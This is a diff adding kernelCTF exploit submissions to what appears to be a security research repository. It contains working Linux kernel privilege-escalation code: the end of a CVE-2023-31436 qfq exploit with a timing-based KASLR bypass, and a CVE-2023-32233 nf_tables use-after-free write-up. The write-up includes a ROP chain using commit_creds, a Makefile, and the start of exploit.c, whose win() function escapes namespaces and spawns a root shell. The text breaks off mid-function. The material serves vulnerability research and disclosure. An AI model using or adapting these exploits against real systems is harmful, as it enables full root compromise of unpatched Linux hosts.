payloads[NUM_SOCKETS2*2] = {0}; + + #define _WAIT_FOR_WAKEUP() { \ + while (wake != i) { \ + sleep(1); \ + if (done) { \ + return 0; \ + } \ + } \ + wake = 0; \ + } + + for (int i = 0; i < NUM_SOCKETS2*2; i++) { + if (payloads[i] > 0) { + close(payloads[i]); + payloads[i] = 0; + } + } + for (int i = 0; i < NUM_SOCKETS2; i++) { + payloads[i] = spray_one_umem(payload); + FAIL_IF(payloads[i] < 0); + } + FAIL_IF(create_tcfilter(s, loindex, handle, 0x1111) != 0); + for (int i = 0; i < NUM_SOCKETS2; i++) { + payloads[i + NUM_SOCKETS2] = spray_one_umem(payload); + FAIL_IF(payloads[i + NUM_SOCKETS2] < 0); + } + + EVENT_SET(parent_notify); + _WAIT_FOR_WAKEUP(); + + if (i == qdisc_trigger_bug) { + L("worker %d is entering stage 1b: trigger vulnerability", i); + + L("trying to prepare helper class .."); + // This is a real helper class: We use it to make the code below follow + // certain paths in sch_qfq.c + // We require the following: + // - qfq_sch->in_serv_agg != NULL + // - qfq_sch->in_serv_agg != OOB agg + // We use a netem qdisc with a large delay to consistently hit the window + // between qfq_enqueue -> qfq_dequeue where the in_serv_agg would be reset. + if (create_helper_class(s, loindex, handle_help, sub_handle_help, 0x1000) != 0) { + E("failed to create helper class :("); + return -1; + } + + L("trying to prepare oob class .."); + // Class which will carry the aggregate with the OOB group + // In order to hit the desired update code paths, this class needs + // packets in its (sub)qdisc. + if (create_helper_class(s, loindex, handle_oob, sub_handle_oob, 0x2000) != 0) { + E("failed to create oob class :("); + return -1; + } + + L("activating helper agg .."); + u8 buf[1] = {0}; + + int sc, ss; + struct sockaddr_in addr; + u32 addr_len; + + ss = socket(AF_INET, SOCK_DGRAM, 0); + FAIL_IF(ss < 0); + sc = socket(AF_INET, SOCK_DGRAM, 0); + FAIL_IF(sc < 0); + + addr.sin_family = AF_INET; + addr.sin_port = 0; + addr.sin_addr.s_addr = htonl(INADDR_LOOPBACK); + + addr_len = sizeof(addr); + + FAIL_IF(bind(ss, (struct sockaddr*)&addr, addr_len) < 0); + FAIL_IF(getsockname(ss, (struct sockaddr*) &addr, &addr_len) < 0) + + // set in_serv_agg = helper agg + FAIL_IF(setsockopt(sc, SOL_SOCKET, SO_PRIORITY, &handle_help, sizeof(handle_help)) < 0); + FAIL_IF(sendto(sc, buf, 1, 0, (struct sockaddr*)&addr, sizeof(addr)) < 0); + + // make (not-yet) oob class active + FAIL_IF(setsockopt(sc, SOL_SOCKET, SO_PRIORITY, &handle_oob, sizeof(handle_oob)) < 0); + FAIL_IF(sendto(sc, buf, 1, 0, (struct sockaddr*)&addr, sizeof(addr)) < 0); + + // trigger vulnerability + // This will create a qfq_aggregate with an OOB group as controlled + // by the MTU we set earlier. + if (create_helper_class(s, loindex, handle_oob, 0, 0) != 0) { + E("failed to trigger vulnerability :("); + return -1; + } + + close(ss); + close(sc); + + EVENT_SET(parent_notify); + _WAIT_FOR_WAKEUP(); + return -1; + } + + { + // trigger payload + + int sc, ss; + struct sockaddr_in addr; + u32 addr_len; + ss = socket(AF_INET, SOCK_DGRAM, 0); + FAIL_IF(ss < 0); + sc = socket(AF_INET, SOCK_DGRAM, 0); + FAIL_IF(sc < 0); + + addr.sin_family = AF_INET; + addr.sin_port = 0; + addr.sin_addr.s_addr = htonl(INADDR_LOOPBACK); + + addr_len = sizeof(addr); + + FAIL_IF(bind(ss, (struct sockaddr*)&addr, addr_len) < 0); + FAIL_IF(getsockname(ss, (struct sockaddr*) &addr, &addr_len) < 0) + + // trigger, what we send does not matter + FAIL_IF(sendto(sc, &addr, 1, 0, (struct sockaddr*)&addr, sizeof(addr)) < 0); + + maybe_win(); + + // payload failed .. + EVENT_SET(parent_notify); + _WAIT_FOR_WAKEUP(); + + return -1; + } +} + +int main(int argc, char* argv[]) { + // main orchestration routine. + + // Hopefully less noise due to thread creation + FAIL_IF(_pin_to_cpu(1) != 0); + + if (argc == 2) { + u64 base = strtoull(argv[1], NULL, 16); + L("using supplied kernel base: %llx", base); + u64 diff = base - 0xffffffff81000000ull; + L("diff: %llx", diff); + + #define __x(name) { name += diff; L("corrected %s to %p", #name, (void*)name); } + FOR_ALL_OFFSETS(__x); + #undef __x + } else { + FAIL_IF(get_kernel_base() < 0); + } + + + payload = mmap(NULL, 0x4000, PROT_READ | PROT_WRITE, MAP_ANON | MAP_PRIVATE, -1, 0); + FAIL_IF(payload == MAP_FAILED); + prep_tcf_proto_payload(payload); + prep_stage1_large_payload(&fake_group); + + for (int try = 0; try < 10; try++) { + int worker_i = 1; + + L("spraying qdiscs .."); + for (worker_i = 1; worker_i <= ATTEMPT_LARGE_EVERY; worker_i++) { + FAIL_IF(spawn_worker(&bug_worker, &worker_i) < 0); + EVENT_WAIT(parent_notify); + } + + worker_i--; + qdisc_trigger_bug = 10; + + wake = qdisc_trigger_bug; + EVENT_WAIT(parent_notify); + + L("triggering payloads .."); + for (int i = 1; i <= worker_i; i++) { + if (i != qdisc_trigger_bug) { + wake = i; + EVENT_WAIT(parent_notify); + } + } + + E("attempt failed .("); + while (last_worker > 0) { + kill_worker(last_worker - 1); + } + sleep(1); + } + + E("we failed .("); + return 0; +} + +// KASLR bypass +// +// This code is adapted from https://github.com/IAIK/prefetch/blob/master/cacheutils.h +// +inline __attribute__((always_inline)) uint64_t rdtsc_begin() { + uint64_t a, d; + asm volatile ("mfence\n\t" + "RDTSCP\n\t" + "mov %%rdx, %0\n\t" + "mov %%rax, %1\n\t" + "xor %%rax, %%rax\n\t" + "lfence\n\t" + : "=r" (d), "=r" (a) + : + : "%rax", "%rbx", "%rcx", "%rdx"); + a = (d<<32) | a; + return a; +} + +inline __attribute__((always_inline)) uint64_t rdtsc_end() { + uint64_t a, d; + asm volatile( + "xor %%rax, %%rax\n\t" + "lfence\n\t" + "RDTSCP\n\t" + "mov %%rdx, %0\n\t" + "mov %%rax, %1\n\t" + "mfence\n\t" + : "=r" (d), "=r" (a) + : + : "%rax", "%rbx", "%rcx", "%rdx"); + a = (d<<32) | a; + return a; +} + + +void prefetch(void* p) +{ + asm volatile ("prefetchnta (%0)" : : "r" (p)); + asm volatile ("prefetcht2 (%0)" : : "r" (p)); +} + + +#define FLUSH_SIZE (4*1024*1024) +u8 __mem[FLUSH_SIZE]; + +inline void flush_cache() { + for (int i = 0; i < FLUSH_SIZE; i++) { + __mem[i] = i; + } +} + +size_t flushandreload(void* addr) // row miss +{ + flush_cache(); + size_t time = rdtsc_begin(); + prefetch(addr); + size_t delta = rdtsc_end() - time; + return delta; +} + +int get_kernel_base() { + L("getting kernel base address .."); + + #define START 0xffffffff80000000ull + #define END 0xfffffffff0000000ull + #define STEP 0x0000000001000000ull + size_t times[(END - START) / STEP] = {0}; + + for (int ti = 0; ti < ARRAY_LEN(times); ti++) { + times[ti] = ~0; + } + + for (int i = 0; i < 16; i++) { + for (int ti = 0; ti < ARRAY_LEN(times); ti++) { + u64 addr = START + STEP * (u64)ti; + size_t t = flushandreload((void*)addr); + if (t < times[ti]) { + times[ti] = t; + } + } + } + + size_t minv = ~0; + size_t mini = -1; + for (int ti = 0; ti < ARRAY_LEN(times) - 1; ti++) { + if (times[ti] < minv) { + mini = ti; + minv = times[ti]; + } + } + + if (mini < 0) { + return -1; + } + + leak_kernel_base = START + STEP * (u64)mini; + L("likely kernel base: %p (%zu)", (void*)leak_kernel_base, times[mini]); + + i64 diff = 0xffffffff81000000 - leak_kernel_base; + L("diff: %lld", diff); + + #define __x(name) { name -= diff; L("corrected %s to %p", #name, (void*)name); } + FOR_ALL_OFFSETS(__x); + #undef __x + return 0; +} diff --git a/pocs/linux/kernelctf/CVE-2023-31436_mitigation/metadata.json b/pocs/linux/kernelctf/CVE-2023-31436_mitigation/metadata.json new file mode 100644 index 00000000..25dfabd6 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2023-31436_mitigation/metadata.json @@ -0,0 +1,24 @@ +{ + "$schema": "https://google.github.io/security-research/kernelctf/metadata.schema.v3.json", + "submission_ids": ["exp52"], + "vulnerability": { + "summary": "qfq_change_class in net/sched/sch_qfq.c in the Linux kernel before 6.2.13 allows an out-of-bounds write because lmax can exceed QFQ_MIN_LMAX.", + "cve": "CVE-2023-31436", + "patch_commit": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=3037933448f60f9acb705997eae62013ecb81e0d", + "affected_versions": ["2.6.0 - 6.2.12"], + "requirements": { + "attack_surface": ["userns"], + "capabilities": ["CAP_NET_ADMIN"], + "kernel_config": [ + "CONFIG_NET_SCH_QFQ" + ] + } + }, + "exploits": { + "mitigation-6.1": { + "uses": ["userns"], + "stability_notes": "5% success rate", + "requires_separate_kaslr_leak": true + } + } +} diff --git a/pocs/linux/kernelctf/CVE-2023-31436_mitigation/original.tar.gz b/pocs/linux/kernelctf/CVE-2023-31436_mitigation/original.tar.gz new file mode 100644 index 00000000..81890120 Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2023-31436_mitigation/original.tar.gz differ diff --git a/pocs/linux/kernelctf/CVE-2023-32233_mitigation/docs/exploit.md b/pocs/linux/kernelctf/CVE-2023-32233_mitigation/docs/exploit.md new file mode 100644 index 00000000..908b0efd --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2023-32233_mitigation/docs/exploit.md @@ -0,0 +1,210 @@ +# Attacking Objects + +- **Information leak/KASLR bypass**: nft_chain + nft_rule/nft_expr [dyn-kmalloc-256] +- **RIP control**: nft_rule/nft_expr (RIP hijacked via expr->deactivate()) [dyn-kmalloc-256] + +# Overview + +This exploit is written based on https://www.openwall.com/lists/oss-security/2023/05/15/5. The exploit strategy is different from the original code. + +# Triggering Vulnerability + +The vulnerability is caused by access to an anonymous nft_set that is being deleted. + +```c +void nf_tables_deactivate_set(const struct nft_ctx *ctx, struct nft_set *set, + struct nft_set_binding *binding, + enum nft_trans_phase phase) +{ + switch (phase) { + case NFT_TRANS_PREPARE: // [1] + set->use--; + return; + case NFT_TRANS_ABORT: + case NFT_TRANS_RELEASE: + set->use--; + fallthrough; + default: + nf_tables_unbind_set(ctx, set, binding, + phase == NFT_TRANS_COMMIT); + } +} +EXPORT_SYMBOL_GPL(nf_tables_deactivate_set); + +void nf_tables_destroy_set(const struct nft_ctx *ctx, struct nft_set *set) +{ + if (list_empty(&set->bindings) && nft_set_is_anonymous(set)) + nft_set_destroy(ctx, set); +} +EXPORT_SYMBOL_GPL(nf_tables_destroy_set); +``` + +Because the `nf_tables_deactivate_set` function does not change the set to the inactive state when an anonymous set is deleted, it can be accessed after the set is destroyed by the `nf_tables_destroy_set` function [1]. + +To trigger the vulnerability, create an anonymous nft_set is and a rule with a lookup expr referencing it. The UAF is then triggered by deleting the rule and then deleting the set or adding/deleting set elements of the set. Note that `nf_tables_deactivate_set` is called while deleting the rule with lookup expr. + +# From UAF to double free + +```c +static void nft_set_destroy(const struct nft_ctx *ctx, struct nft_set *set) +{ + int i; + + if (WARN_ON(set->use > 0)) + return; + + for (i = 0; i < set->num_exprs; i++) + nft_expr_destroy(ctx, set->exprs[i]); + + set->ops->destroy(set); + nft_set_catchall_destroy(ctx, set); + kfree(set->name); // [2] + kvfree(set); +} +``` + +When the nft_lookup expr is destroyed, the `nft_set_destroy` function is called and free `set->name`[2]. When the set is destroyed again, the `nft_set_destroy` function is called one more time on this nft_set, resulting in a double free. In between the two calls to `nft_set_destroy`, I create another target nft_set to make this nft_set free. At this time, I make the length of the set's name in between 193-256 to place it to dyn-kmalloc-256. + +```c +struct nft_chain { + struct nft_rule_blob __rcu *blob_gen_0; + struct nft_rule_blob __rcu *blob_gen_1; + struct list_head rules; + struct list_head list; + struct rhlist_head rhlhead; + struct nft_table *table; + u64 handle; + u32 use; + u8 flags:5, + bound:1, + genmask:2; + char *name; + u16 udlen; + u8 *udata; // [3] + + /* Only used during control plane commit phase: */ + struct nft_rule_blob *blob_next; +}; +``` + +Then, I utilized the udata field [3] of the nft_chain structure for information leak and RIP control. To do this, the udata of nft_chain is allocated in dyn-kmalloc-256 and overlaps with set->name of the target set. + +```c +static int nf_tables_addchain(struct nft_ctx *ctx, u8 family, u8 genmask, + u8 policy, u32 flags, + struct netlink_ext_ack *extack) + ... + +if (nla[NFTA_CHAIN_USERDATA]) { + chain->udata = nla_memdup(nla[NFTA_CHAIN_USERDATA], GFP_KERNEL_ACCOUNT); // [4] + if (chain->udata == NULL) { + err = -ENOMEM; + goto err_destroy_chain; + } + chain->udlen = nla_len(nla[NFTA_CHAIN_USERDATA]); + } +``` + +The udata of nft_chain is input from the user in the `nf_tables_addchain` function [4]. + +# KASLR Bypass and Information Leak + +To bypass KASLR, I used the `struct nft_rule`. The nft_rule contains `struct nft_expr` [5], which stores the address of the `struct nft_expr_ops` [6]. Since address of `nft_expr_ops` is a kernel address, we can bypass KASLR by read it. We can also get the heap address by reading the list in the struct nft_rule. This address will be used later to create fake ops and store the ROP payload. In this exploit, I used `nft_counter_ops`. + +```c +struct nft_rule { + struct list_head list; + u64 handle:42, + genmask:2, + dlen:12, + udata:1; + unsigned char data[] + __attribute__((aligned(__alignof__(struct nft_expr)))); // [5] +}; +``` + +```c +struct nft_expr { + const struct nft_expr_ops *ops; // [6] + unsigned char data[] + __attribute__((aligned(__alignof__(u64)))); +}; +``` + +# RIP Control + +Create a fake rule to control the RIP. Since `expr->ops->deactivate` is called in the `nft_rule_expr_deactivate` function when deleting a rule [7], we can control the RIP by modifying with the address of the ops. + +```c +static void nft_rule_expr_deactivate(const struct nft_ctx *ctx, + struct nft_rule *rule, + enum nft_trans_phase phase) +{ + struct nft_expr *expr; + + expr = nft_expr_first(rule); + while (nft_expr_more(rule, expr)) { + if (expr->ops->deactivate) + expr->ops->deactivate(ctx, expr, phase); // [7] + + expr = nft_expr_next(expr); + } +} +``` + +To do this, we free the rule we sprayed for the leak and spray a fake rule with chain->udata at this location. + +```c + struct fake_nft_rule * payload = (struct fake_nft_rule *) data; + + payload->dlen = 8; + payload->genmask = 0; + payload->handle = 0xffff; + payload->list.prev = (void*) 0; + payload->list.next = (void*) 0; + + *((uint64_t*)data + (sizeof(struct fake_nft_rule) / sizeof(uint64_t*))) = heap_addr; // expr->ops + +``` + +I sprayed a fake rule with `dlen` greater than `0` and `handle` `0xffff`. And when I delete the rule with handle `0xffff`, the RIP is controlled. + +# Post-RIP + +I make the following ROP payload to get the shell. For simplicity, I utilized the Telefork technique suggested by Kyle (https://blog.kylebot.net/2022/10/16/CVE-2022-1786/). + +```c +void make_payload_rop(uint64_t* data){ + int i = 0; + + data[i++] = kbase + POP_RSI_RET; // dummy + data[i++] = 0; + + data[i++] = kbase + POP_RSI_RET; // dummy + data[i++] = 0; + + data[i++] = kbase + POP_RSI_RET; // dummy + data[i++] = kbase + PUSH_RAX_POP_RSP; // expr->ops->deactivate() + + // find_task_by_vpid(1) + data[i++] = kbase + POP_RDI_RET; + data[i++] = 1; + data[i++] = kbase + FIND_TASK_BY_VPID; + + // switch_task_namespaces(find_task_by_vpid(1), &init_nsproxy) + data[i++] = kbase + MOV_RDI_RAX_RET; + data[i++] = kbase + POP_RSI_RET; + data[i++] = kbase + INIT_NSPROXY; + data[i++] = kbase + SWITCH_TASK_NAMESPACES; + + // commit_creds(&init_cred) + data[i++] = kbase + POP_RDI_RET; + data[i++] = kbase + INIT_CRED; + data[i++] = kbase + COMMIT_CREDS; + + data[i++] = kbase + VFORK; + data[i++] = kbase + DELAY; +} +``` + +However, when using the `fork` system call, a lot of double fault exceptions occurred, so we used `vfork`. Since `vfork` also causes a double fault exception, it is better to use the `iret` gadget to return to the userspace to increase the reliability of the exploit. \ No newline at end of file diff --git a/pocs/linux/kernelctf/CVE-2023-32233_mitigation/docs/novel-techniques.md b/pocs/linux/kernelctf/CVE-2023-32233_mitigation/docs/novel-techniques.md new file mode 100644 index 00000000..385b0010 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2023-32233_mitigation/docs/novel-techniques.md @@ -0,0 +1,23 @@ +# Novel Techniques + +## Powerful Universal Obejct: `struct nft_rule` + +`struct nft_rule` is a very powerful primitive that can be used to do KASLR bypass, leak heap address, RIP control, and data spraying. We can get the kernel base address by reading the ops structure of expr stored in `nft_rule`. We can also read the list of `nft_rule` and the heap address stored in nft_expr and utilize it in an attack. Finally, the ops address of the expr can be manipulated to perform RIP control. Additionally, the userdata field of the `nft_rule` can be used for data spraying. + +```c +struct nft_rule { + struct list_head list; + u64 handle:42, + genmask:2, + dlen:12, + udata:1; + unsigned char data[] + __attribute__((aligned(__alignof__(struct nft_expr)))); +}; + +struct nft_expr { + const struct nft_expr_ops *ops; + unsigned char data[] + __attribute__((aligned(__alignof__(u64)))); +}; +``` \ No newline at end of file diff --git a/pocs/linux/kernelctf/CVE-2023-32233_mitigation/docs/vulnerability.md b/pocs/linux/kernelctf/CVE-2023-32233_mitigation/docs/vulnerability.md new file mode 100644 index 00000000..be67b089 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2023-32233_mitigation/docs/vulnerability.md @@ -0,0 +1,12 @@ +- Requirements: + - Capabilities: CAP_NET_ADMIN + - Kernel configuration: CONFIG_NETFILTER, CONFIG_NF_TABLES + - User namespaces required: Yes +- Introduced by: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=20a69341f2d00cd042e81c82289fba8a13c05a25 (netfilter: nf_tables: add netlink set API) +- Fixed by: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=c1592a89942e9678f7d9c8030efa777c0d57edab (netfilter: nf_tables: deactivate anonymous set from preparation phase) +- Affected Version: v3.13-rc1 - v6.4-rc6 +- Affected Component: net/netfilter +- Cause: Use-After-Free +- Syscall to disable: disallow unprivileged username space +- URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2023-32233 +- Description: In the Linux kernel through 6.3.1, a use-after-free in Netfilter nf_tables when processing batch requests can be abused to perform arbitrary read and write operations on kernel memory. Unprivileged local users can obtain root privileges. This occurs because anonymous sets are mishandled. \ No newline at end of file diff --git a/pocs/linux/kernelctf/CVE-2023-32233_mitigation/exploit/mitigation-6.1/Makefile b/pocs/linux/kernelctf/CVE-2023-32233_mitigation/exploit/mitigation-6.1/Makefile new file mode 100644 index 00000000..2d064e70 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2023-32233_mitigation/exploit/mitigation-6.1/Makefile @@ -0,0 +1,35 @@ +LIBMNL_DIR = $(realpath ./)/libmnl_build +LIBNFTNL_DIR = $(realpath ./)/libnftnl_build + +exploit: + gcc -o exploit exploit.c -L$(LIBNFTNL_DIR)/install/lib -L$(LIBMNL_DIR)/install/lib -lnftnl -lmnl -I$(LIBNFTNL_DIR)/install/include -I$(LIBMNL_DIR)/install/include -static + +prerequisites: libmnl-build libnftnl-build + +libmnl-build : libmnl-download + tar -C $(LIBMNL_DIR) -xvf $(LIBMNL_DIR)/libmnl-1.0.5.tar.bz2 + cd $(LIBMNL_DIR)/libmnl-1.0.5 && ./configure --enable-static --prefix=`realpath ../install` + cd $(LIBMNL_DIR)/libmnl-1.0.5 && make + cd $(LIBMNL_DIR)/libmnl-1.0.5 && make install + +libnftnl-build : libmnl-build libnftnl-download + tar -C $(LIBNFTNL_DIR) -xvf $(LIBNFTNL_DIR)/libnftnl-1.2.5.tar.xz + cd $(LIBNFTNL_DIR)/libnftnl-1.2.5 && PKG_CONFIG_PATH=$(LIBMNL_DIR)/install/lib/pkgconfig ./configure --enable-static --prefix=`realpath ../install` + cd $(LIBNFTNL_DIR)/libnftnl-1.2.5 && C_INCLUDE_PATH=$(C_INCLUDE_PATH):$(LIBMNL_DIR)/install/include LD_LIBRARY_PATH=$(LD_LIBRARY_PATH):$(LIBMNL_DIR)/install/lib make + cd $(LIBNFTNL_DIR)/libnftnl-1.2.5 && make install + +libmnl-download : + mkdir $(LIBMNL_DIR) + wget -P $(LIBMNL_DIR) https://netfilter.org/projects/libmnl/files/libmnl-1.0.5.tar.bz2 + +libnftnl-download : + mkdir $(LIBNFTNL_DIR) + wget -P $(LIBNFTNL_DIR) https://netfilter.org/projects/libnftnl/files/libnftnl-1.2.5.tar.xz + +run: + ./exploit + +clean: + rm -rf $(LIBMNL_DIR) + rm -rf $(LIBNFTNL_DIR) + rm -f exploit \ No newline at end of file diff --git a/pocs/linux/kernelctf/CVE-2023-32233_mitigation/exploit/mitigation-6.1/exploit b/pocs/linux/kernelctf/CVE-2023-32233_mitigation/exploit/mitigation-6.1/exploit new file mode 100755 index 00000000..d175430c Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2023-32233_mitigation/exploit/mitigation-6.1/exploit differ diff --git a/pocs/linux/kernelctf/CVE-2023-32233_mitigation/exploit/mitigation-6.1/exploit.c b/pocs/linux/kernelctf/CVE-2023-32233_mitigation/exploit/mitigation-6.1/exploit.c new file mode 100644 index 00000000..18bd99f4 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2023-32233_mitigation/exploit/mitigation-6.1/exploit.c @@ -0,0 +1,1542 @@ +#define _GNU_SOURCE + +#include +#include +#include +#include +#include +#include +#include +#include + +#include +#include +#include +#include +#include +#include +#include + +#include +#include +#include +#include + +#include +#include +#include +#include +#include +#include + + +uint64_t cfg_race_set_slab = 1; +uint64_t cfg_race_set_elem_count = 0x300 * 0x800; + +useconds_t cfg_initial_usleep = 1 * 1000 * 1000; +useconds_t cfg_race_lead_usleep = 50 * 1000; +useconds_t cfg_race_lag_usleep = 300 * 1000; +useconds_t cfg_reuse_usleep = 50 * 1000; + + +#define FIND_TASK_BY_VPID 0x10a0d0 +#define SWITCH_TASK_NAMESPACES 0x111c80 +#define COMMIT_CREDS 0x1136f0 +#define INIT_NSPROXY 0x2661680 +#define INIT_CRED 0x26618c0 +#define SWAPGS_RESTORE_REGS_AND_RETURN_TO_USERMODE 0x12010c6 +#define VFORK 0x0e37d0 +#define DELAY 0x17da60 +#define NFT_COUNTER_OPS 0x1af8340 + +#define PUSH_RAX_POP_RSP 0xaec248; // 0xffffffff81aec248 : push rax ; pop rsp ; xor eax, eax ; jmp 0xffffffff82404440 +#define POP_RDI_RET 0x1481f3; // 0xffffffff811481f3 : pop rdi ; jmp 0xffffffff82404440 +#define POP_RSI_RET 0x0d813f; // 0xffffffff810d813f : pop rsi ; jmp 0xffffffff82404440 +#define MOV_RDI_RAX_RET 0x61dd6a; // 0xffffffff8161dd6a : mov rdi, rax ; mov dword ptr [rdx], ecx ; mov rax, rdi ; jmp 0xffffffff82404440 +#define POP_RDX_RET 0x6f12a0; // 0xffffffff816f12a0 : pop rdx ; xor eax, eax ; jmp 0xffffffff82404440 + +#define uaf_chunk_size 0x80 +#define mnl_batch_limit (1024 * 1024) + +uint64_t nft_counter_ops; +uint64_t kbase; +uint64_t heap_addr; +uint64_t victim_rule_handle; + +char mnl_batch_buffer[2 * mnl_batch_limit]; + +char uaf_set_key[8 + 0x34]; + +void win(){ + setns(open("/proc/1/ns/mnt", O_RDONLY), 0); + setns(open("/proc/1/ns/pid", O_RDONLY), 0); + setns(open("/proc/1/ns/net", O_RDONLY), 0); + + system("cat /flag"); + + char *args[] = {"/bin/sh", NULL}; + execve("/bin/sh", args, NULL); + + exit(0); +} + +int cfg_load_line(char *line) +{ + char *saveptr = NULL; + char *value = strtok_r(line, "\t ", &saveptr); + if (value == NULL) { + return EFAULT; + } + + char *key = NULL; + do { + key = strtok_r(NULL, "\t\n ", &saveptr); + if (key == NULL) { + return EFAULT; + } + } while (strlen(key) < 2); + + errno = 0; + + if (strcmp(key, "race_set_slab") == 0) { + cfg_race_set_slab = strtoul(value, NULL, 0); + } + else if (strcmp(key, "race_set_elem_count") == 0) { + cfg_race_set_elem_count = 1000L * strtoul(value, NULL, 0); + } + else if (strcmp(key, "initial_sleep") == 0) { + cfg_initial_usleep = 1000L * strtoul(value, NULL, 0); + } + else if (strcmp(key, "race_lead_sleep") == 0) { + cfg_race_lead_usleep = 1000L * strtoul(value, NULL, 0); + } + else if (strcmp(key, "race_lag_sleep") == 0) { + cfg_race_lag_usleep = 1000L * strtoul(value, NULL, 0); + } + else if (strcmp(key, "reuse_sleep") == 0) { + cfg_reuse_usleep = 1000L * strtoul(value, NULL, 0); + } + else { + errno = ENOENT; + } + + return errno; +} + +static void cfg_load(char *path) +{ + FILE *stream = fopen(path, "r"); + if (stream != NULL) { + char *line = NULL; + size_t len = 0; + ssize_t nread; + + while ((nread = getline(&line, &len, stream)) != -1) { + printf("[*] Profile line: %s", line); + if (cfg_load_line(line) != 0) { + printf("[!] ERROR\n"); + } + } + fclose(stream); + } +} + +void hex_dump(const char *data, ssize_t size) +{ + if (size <= 0) { + printf("\n*** empty ***\n"); + } + else { + char hex_buf[0x40]; + char ascii_buf[0x20]; + ssize_t ix = 0; + int pos = 0; + + do { + unsigned char byte = data[ix]; + + sprintf(hex_buf + 3 * pos, "%02x ", byte); + ascii_buf[pos] = ((0x20 <= byte) && (byte < 0x7e))? byte: '.'; + + ++ ix; + ++ pos; + if ((ix == size) || (pos == 0x10)) { + ascii_buf[pos] = 0; + printf("\n%04lx: %-48s | %s", ix - pos, hex_buf, ascii_buf); + pos = 0; + } + } while (ix < size); + printf("\n"); + } +} + +static void append_del_set_handle(struct mnl_nlmsg_batch *batch, uint32_t seq, + uint32_t family, char *table_name, uint64_t handle) +{ + struct nftnl_set *set = nftnl_set_alloc(); + if (set == NULL) { + errx(1, "Cannot into nftnl_set_alloc()"); + } + + nftnl_set_set_u32(set, NFTNL_SET_FAMILY, family); + nftnl_set_set_str(set, NFTNL_SET_TABLE, table_name); + nftnl_set_set_u64(set, NFTNL_SET_HANDLE, handle); + + struct nlmsghdr *nlh = nftnl_set_nlmsg_build_hdr( + mnl_nlmsg_batch_current(batch), + NFT_MSG_DELSET, + NFPROTO_INET, + NLM_F_ACK, + seq + ); + nftnl_set_nlmsg_build_payload(nlh, set); + mnl_nlmsg_batch_next(batch); + + nftnl_set_free(set); +} + +static void append_del_set(struct mnl_nlmsg_batch *batch, uint32_t seq, + uint32_t family, char *table_name, char *set_name) +{ + struct nftnl_set *set = nftnl_set_alloc(); + if (set == NULL) { + errx(1, "Cannot into nftnl_set_alloc()"); + } + + nftnl_set_set_u32(set, NFTNL_SET_FAMILY, family); + nftnl_set_set_str(set, NFTNL_SET_TABLE, table_name); + nftnl_set_set_str(set, NFTNL_SET_NAME, set_name); + + struct nlmsghdr *nlh = nftnl_set_nlmsg_build_hdr( + mnl_nlmsg_batch_current(batch), + NFT_MSG_DELSET, + NFPROTO_INET, + NLM_F_ACK, + seq + ); + nftnl_set_nlmsg_build_payload(nlh, set); + mnl_nlmsg_batch_next(batch); + + nftnl_set_free(set); +} + +static void append_del_chain(struct mnl_nlmsg_batch *batch, uint32_t seq, + uint32_t family, char *table_name, char *chain_name) +{ + struct nftnl_chain *chain = nftnl_chain_alloc(); + if (chain == NULL) { + errx(1, "Cannot into nftnl_chain_alloc()"); + } + + nftnl_chain_set_u32(chain, NFTNL_CHAIN_FAMILY, family); + nftnl_chain_set_str(chain, NFTNL_CHAIN_TABLE, table_name); + nftnl_chain_set_str(chain, NFTNL_CHAIN_NAME, chain_name); + + struct nlmsghdr *nlh = nftnl_set_nlmsg_build_hdr( + mnl_nlmsg_batch_current(batch), + NFT_MSG_DELCHAIN, + NFPROTO_INET, + 0, + seq + ); + nftnl_chain_nlmsg_build_payload(nlh, chain); + mnl_nlmsg_batch_next(batch); + + nftnl_chain_free(chain); +} + +static void append_del_rule(struct mnl_nlmsg_batch *batch, uint32_t seq, + uint32_t family, char *table_name, char *chain_name, uint64_t rule_handle) +{ + struct nftnl_rule *rule = nftnl_rule_alloc(); + if (rule == NULL) { + errx(1, "Cannot into nftnl_rule_alloc()"); + } + + nftnl_rule_set_str(rule, NFTNL_RULE_TABLE, table_name); + nftnl_rule_set_str(rule, NFTNL_RULE_CHAIN, chain_name); + nftnl_rule_set_u32(rule, NFTNL_RULE_FAMILY, family); + if (rule_handle != -1) { + nftnl_rule_set_u64(rule, NFTNL_RULE_HANDLE, rule_handle); + } + + struct nlmsghdr *nlh = nftnl_rule_nlmsg_build_hdr( + mnl_nlmsg_batch_current(batch), + NFT_MSG_DELRULE, + family, + NLM_F_ACK, + seq + ); + nftnl_rule_nlmsg_build_payload(nlh, rule); + mnl_nlmsg_batch_next(batch); + + nftnl_rule_free(rule); +} + + +uint32_t pwn_family = NFPROTO_INET; +char *pwn_table = "testfirewall"; + +char *pwn_lookup_set = "s_a"; +char *pwn_lookup_chain = "OUTPUT"; + +char *pwn_log_chain = "INPUT"; + +static void pwn_create_table(struct mnl_nlmsg_batch *batch, uint32_t seq) +{ + struct nftnl_table *table = nftnl_table_alloc(); + if (table == NULL) { + errx(1, "Cannot into nftnl_table_alloc()"); + } + + nftnl_table_set_u32(table, NFTNL_TABLE_FAMILY, pwn_family); + nftnl_table_set_str(table, NFTNL_TABLE_NAME, pwn_table); + + struct nlmsghdr *nlh = nftnl_table_nlmsg_build_hdr( + mnl_nlmsg_batch_current(batch), + NFT_MSG_NEWTABLE, + pwn_family, + NLM_F_CREATE | NLM_F_ACK, + seq + ); + nftnl_table_nlmsg_build_payload(nlh, table); + mnl_nlmsg_batch_next(batch); + + nftnl_table_free(table); +} + + +static void pwn_create_set(struct mnl_nlmsg_batch *batch, uint32_t seq, + char *set_name, uint32_t set_id, uint32_t set_flags, + uint32_t set_key_len, uint32_t set_desc_size, + void *set_userdata, uint32_t set_userdata_len) +{ + struct nftnl_set *set = nftnl_set_alloc(); + if (set == NULL) { + errx(1, "Cannot into nftnl_set_alloc()"); + } + + nftnl_set_set_u32(set, NFTNL_SET_FAMILY, pwn_family); + nftnl_set_set_str(set, NFTNL_SET_TABLE, 